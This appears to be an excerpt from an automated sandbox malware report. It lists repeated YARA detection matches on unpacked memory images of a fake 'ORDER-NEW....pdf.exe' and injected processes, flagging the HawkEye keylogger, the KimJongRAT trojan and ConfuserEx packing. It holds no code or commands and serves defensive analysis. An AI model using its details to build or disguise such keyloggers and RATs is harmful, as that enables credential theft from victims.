              Source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
